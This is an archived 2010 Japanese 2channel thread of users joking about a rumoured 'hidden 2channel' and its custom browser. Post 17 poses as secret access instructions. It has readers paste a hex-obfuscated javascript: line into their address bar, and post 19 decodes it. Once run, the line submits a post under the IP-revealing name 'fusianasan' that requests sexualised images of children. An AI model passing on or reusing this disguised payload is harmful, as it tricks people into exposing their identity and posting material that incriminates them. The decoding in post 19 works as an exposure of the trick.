2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

裏2ちゃんねる専用ブラウザ

1 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:28:58 ID:x5svqKVB0
頑張れ!!

2 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:29:41 ID:QQuWTyTTP
      //                    |
      /         ,ィ介i      |   う  ぶ  き
      {. |l     ,イ  ///||     |   ち   っ え
     ,-.、Vl      / | /// | |    」  に  と  ろ
      lこ!l ! ト   ト.l | !i  | ヽト、<   な  ば
      |  l Vヽ  トjヽ\!l   ,>‐_ニヽ     さ
     |  |   \ ! く__・、jiLノ・_´フ .||   れ
     | | __   ヽ} -‐   -─‐  レヘ.   ん
   _r‐j   >イ fヽ  l   ノ  __    ,イ-ハ
  / ′、   i   {ノ-、 ヽ  `t_/  /| /´ヽ
 〈 ヽ    l   |  }   \    -' j  |   \
  ヽ          /     |  ̄     L


3 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:30:12 ID:dXzsusJz0
>>1
マジでやめろ。鮫島事件の話は本当にヤバいんだから。

4 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:33:10 ID:x5svqKVB0
Pとかやっててつらくないの?

5 :名無しさん@お腹いっぱい。:2010/01/30(土) 19:43:18 ID:aqD2j0NQ0
無理だろ

6 :名無しさん@お腹いっぱい。:2010/01/31(日) 10:42:43 ID:9cXssqsJ0
サガットブラウザはネットフレームワークすらインスコできない

7 :黒神 めだか▲√\†\Δ@φ ◆.ViewVAQFo :2010/01/31(日) 11:18:54 ID:zGL+g9fU0 ?2BP(301)
この裏2ちゃんねる、使ってみたが、使い勝手はあまり良くなかった。
昨年の11月頃、削除要請板の荒らしによって規制に巻き込まれたとき、
このサイトを知ってちょっとだけ利用してみたが、非常に今市であった。

それよりも、このスレを見てみろ。古い手法に釣られるゆとりが多く、
わざと節穴で書いて、正規のリモートホストが多数に表示されていてワロタ。

裏2ちゃんねるスケート板への入り方まとめスレ
ttp://hideyoshi.2ch.net/test/read.cgi/skate/1233482920/

節穴は批判要望板とか、一部の板以外は使わないし…。

8 :名無しさん@お腹いっぱい。:2010/01/31(日) 13:04:16 ID:smj5EV/wO
あそこのブラウザ、スクロールがもたつくんだよなぁ…(リッチテキストコントロールを使ってるからかな?)

仕様さえ公開してくれれば自分で作るのに。

9 :名無しさん@お腹いっぱい。:2010/02/01(月) 23:22:54 ID:la58oxHc0
裏2ちゃん流行りはじめたぞー

10 :黒神 めだか▲√\†\Δ@φ ◆DMZBuMECHA :2010/02/03(水) 19:19:22 ID:i5vcvl8E0 ?2BP(301)
私の要望

★:Jane Style、Jane Viewで使用可能な配慮。
※この配慮がなければ掲示板とは言えない。
★:「裏2ちゃんねる」ではなく「サガットちゃんねる」に変更せよ。
※何故なら、非常に紛らわしいため。

★:トリップの◆マーク、★マークになっている件。◆マークへしてもいいのじゃないかと。
「黒神 めだか ★」とかのキャップはしたらばにある自分専用掲示板で実現済み。
あそこのトリップではキャップを使った気がしないこと。

11 :名無しさん@お腹いっぱい。:2010/02/05(金) 10:12:03 ID:0Mb9fryC0
自分で掲示板作ればいいんじゃないですかね

12 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:22:34 ID:e5XUWJc80
いつも思うんだが
仮に裏2ちゃんねるがあったとしても
めっちゃ過疎ってると思うぞ?

13 :名無しさん@お腹いっぱい。:2010/02/05(金) 22:59:00 ID:DqwPmE9O0
順調に増えてるよ

14 :名無しさん@お腹いっぱい。:2010/02/06(土) 00:54:14 ID:cicD3kPY0
確かに。新月の過疎り具合を見てるとそう思うね。

15 :名無しさん@お腹いっぱい。:2010/02/07(日) 01:33:48 ID:yyKM+sS2P


16 :名無しさん@お腹いっぱい。:2010/02/18(木) 18:24:32 ID:htm4LlUJO
新月って20〜30人くらいだから何かあったら全員呼び出せばいいよな

17 :名無しさん@お腹いっぱい。:2010/02/26(金) 17:43:50 ID:hRE3eTF+0
[極秘]裏2chアクセス方法[初心者厳禁]
2ちゃんねる歴2年以下の方はご遠慮下さい。

(準備)
2ch専用ブラウザを使用している人は、
IEなどの一般的なブラウザでこのスレを開いておく。

1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414745
2e76616c75653d275c75333045445c75333045415
c75373533425c75353043465c75333034465c75333036305c7533
3035355c7533303434273b7375626d69742e636c69636b28293b7
d';for(l=0,e="";l<s.length;l+=2)e+='%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

2、
改行を外して1行にする。

3、
1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。

4、
Enterを押す(もしくは「移動」をクリックする)。


18 :名無しさん@お腹いっぱい。:2010/03/03(水) 08:53:51 ID:p0ILFgld0
なんやそれ

19 :名無しさん@お腹いっぱい。:2010/03/03(水) 09:43:19 ID:sO6v+R250
>>17
with(document.forms[0])
{
 FROM.value='fusianasan';
 MESSAGE.value='\u30ED\u30EA\u753B\u50CF\u304F\u3060\u3055\u3044';
 submit.click();
}

eval()が複合した文字列を実行するコマンドなので、
elert()に置き換えたら上記スクリプトが見れます。

\u30ED\u30EA\u753B\u50CF\u304F\u3060\u3055\u3044
上記はユニコード文字列で、「ロリ画像ください」と書き込まれるそうです。
IPさらした上で・・・

ユニコードの扱いは専用ブラウザと一般ブラウザ、スクリプトでは違うので、
上記コードを直接書き込んでも見たままが反映されます。

文字列でぐぐったらあちこちにコピペされているようですね。


6 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)